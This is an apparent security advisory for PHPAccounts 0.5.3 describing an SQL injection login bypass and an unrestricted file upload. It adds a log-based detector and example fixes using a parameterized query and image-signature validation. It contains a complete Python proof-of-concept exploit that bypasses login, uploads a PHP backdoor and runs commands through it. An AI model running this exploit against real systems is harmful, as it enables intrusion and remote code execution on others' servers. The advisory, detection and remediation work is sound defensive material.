Release date:
Updated on:
Affected Systems:
PHPAccounts
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53920
PHPAccounts is a simple web-based accounting application for small businesses, freelancers, and consulting companies.
PHPAccounts is prone to an SQL injection vulnerability and an arbitrary file upload vulnerability. Both stem from insufficient validation of user-supplied input. An attacker can exploit them to compromise the application, execute arbitrary code, access or modify data, or exploit weaknesses in the underlying database.
Source: loneferret
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (method) may be offensive and is intended only for security research and teaching. Use at your own risk!
#!/usr/bin/python
import re, mechanize
import urllib, sys

print "\n[*] phpAccounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# Stage 1: authentication bypass through the SQL injection in the login form
print "[*] Bypassing Login."
try:
    br = mechanize.Browser()
    br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
    assert br.viewing_html()
    br.select_form(name="loginForm")
    br.select_form(nr=0)
    br.form['login_username'] = "x' or '1'#"
    br.form['login_password'] = "pwnd"
    print "[*] Triggering SQLi.."
    br.submit()
except:
    print "[*] Oups... Something happened"
    exit(0)

# Stage 2: unrestricted file upload through the letterhead image preference
print "[*] Uploading Shell..."
try:
    br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
    assert br.viewing_html()
    br.select_form(nr=0)
    br.form["Preferences[LETTER_HEADER]"] = 'test'
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
    br.submit(nr=2)
except:
    print "[*] Upload didn't work"
    exit(0)

# Stage 3: the uploaded file is served from the user's directory and executed as PHP
print "[*] Command Executed\n"
try:
    shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost, rcmd))
    print shell.read()
except:
    print "[*] Oups."
    exit(0)
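The test method above leaves a recognisable trace in the web server's access log: a POST to the preferences (upload) endpoint followed by a request for a .php file under the per-user upload directory. The following detector, an added example that is not part of the advisory or of PHPAccounts itself, scans Apache combined-format log lines for a server-side script being requested from /phpaccounts/users/<id>/ and raises the severity when the same client posted to the upload endpoint earlier in the log. The log lines are constructed for the example; the paths are those named in the test method, and the extension list and log format are assumptions.

```python
import re

# Constructed Apache combined-format access log lines (not from a real system)
# illustrating the upload-then-execute sequence described in the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2012:10:00:01 +0000] "GET /phpaccounts/index.php?frameset=true HTTP/1.1" 200 2310 "-" "Python-urllib/2.7"
203.0.113.7 - - [12/Jun/2012:10:00:02 +0000] "POST /phpaccounts/index.php HTTP/1.1" 302 0 "-" "Python-urllib/2.7"
203.0.113.7 - - [12/Jun/2012:10:00:03 +0000] "POST /phpaccounts/index.php?page=tasks&action=preferences HTTP/1.1" 200 1744 "-" "Python-urllib/2.7"
203.0.113.7 - - [12/Jun/2012:10:00:04 +0000] "GET /phpaccounts/users/1/backdoor.php?cmd=id HTTP/1.1" 200 58 "-" "Python-urllib/2.7"
198.51.100.9 - - [12/Jun/2012:10:05:00 +0000] "GET /phpaccounts/users/2/letterhead.png HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Per-user directory PHPAccounts serves letterhead uploads from (path taken
# from the advisory's test method).
UPLOAD_DIR_RE = re.compile(r"^/phpaccounts/users/\d+/")
# Extensions a typical PHP-enabled web server hands to the interpreter (assumed list).
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)
# Endpoint that accepts the letterhead_image upload.
UPLOAD_ENDPOINT_RE = re.compile(r"^/phpaccounts/index\.php\?.*action=preferences")


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_alerts(log_text):
    """Flag requests that execute a server-side script from the upload directory.

    A request for a .php/.phtml/.phar resource under /phpaccounts/users/<id>/
    is always suspicious, since only images belong there.  If the same client
    posted to the preferences (upload) endpoint earlier in the log, the alert
    is raised to high severity: that is the full upload-then-execute chain."""
    alerts = []
    uploaders = {}  # client ip -> timestamp of its last POST to the upload endpoint
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPLOAD_ENDPOINT_RE.match(rec["path"]):
            uploaders[rec["ip"]] = rec["ts"]
        if UPLOAD_DIR_RE.match(rec["path"]) and SCRIPT_EXT_RE.search(rec["path"]):
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["path"],
                "status": rec["status"],
                "severity": "high" if rec["ip"] in uploaders else "medium",
                "upload_seen_at": uploaders.get(rec["ip"]),
            })
    return alerts


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print("%(severity)s %(ip)s %(ts)s %(path)s (status %(status)s)" % a)
```

The login-bypass stage is not visible here because the injected username travels in the POST body, which the access log does not record; catching that stage needs request-body inspection (a WAF or audit log) or application-side logging of failed and anomalous logins.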
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PHPAccounts
-----------
Currently, the vendor has not released a patch or upgrade. Users of the software are advised to monitor the vendor's homepage for the latest version:
http://phpaccounts.com/
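With no vendor patch available, the two root causes named in the description can still be closed in code. The following Python 3 example is added here and is not PHPAccounts code or a vendor fix; it shows the two controls a fix would need: a parameterized login query, against which the advisory's injected username is just a literal string, and an upload validator that decides by file signature and never lets a client-chosen name or extension reach the stored file. The user table, salt, password hashing and image signature list are constructed for the example, and sqlite3 stands in for the application's real database (the page's payload uses a MySQL-style # comment, but the schema and engine are not documented on the page).

```python
import hashlib
import os
import re
import sqlite3

# Constructed stand-in for the application's user table; sqlite3 is used only
# so the example runs offline.
SALT = b"constructed-demo-salt"  # use a random per-user salt in a real deployment


def hash_password(password):
    """Slow salted hash; the stored value is what the login query compares against."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100000).hex()


_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)")
_db.execute("INSERT INTO users VALUES (1, 'alice', ?)", (hash_password("correct horse"),))
_db.commit()


def login_user(username, password):
    """Authenticate with a parameterized query.

    Both values are bound as parameters, so an injected username such as
    x' or '1'#  is compared as a literal string and cannot rewrite the WHERE
    clause.  Returns the user id on success, otherwise None."""
    row = _db.execute(
        "SELECT id FROM users WHERE username = ? AND password_hash = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row[0] if row else None


# Leading bytes of the only file types a letterhead image should ever be.
IMAGE_SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_letterhead_upload(client_filename, content):
    """Return the server-side filename to store an accepted image under, or None.

    The client-supplied name and Content-Type are never trusted for the decision:
    the file must start with a known image signature, and the stored name is an
    allowlisted stem plus the extension implied by that signature, so a name
    like backdoor.php can never land in the web root with a script extension."""
    for magic, ext in IMAGE_SIGNATURES:
        if content.startswith(magic):
            stem = os.path.splitext(os.path.basename(client_filename))[0]
            if not SAFE_STEM.match(stem):
                stem = "letterhead"
            return "%s.%s" % (stem, ext)
    return None


if __name__ == "__main__":
    print(login_user("alice", "correct horse"))  # 1
    print(login_user("x' or '1'#", "pwnd"))  # None
    print(validate_letterhead_upload("backdoor.php", b"<?php echo 1; ?>"))  # None
    print(validate_letterhead_upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))  # logo.png
```

A signature check on its own is not what makes the upload safe, since a file can carry a valid image header and still be something else; the protection comes from the validator choosing the extension, from storing uploads in a directory the web server does not execute scripts from (or outside the document root, served through a handler that sets the content type), and from the parameterized query leaving the attacker no way past the login in the first place.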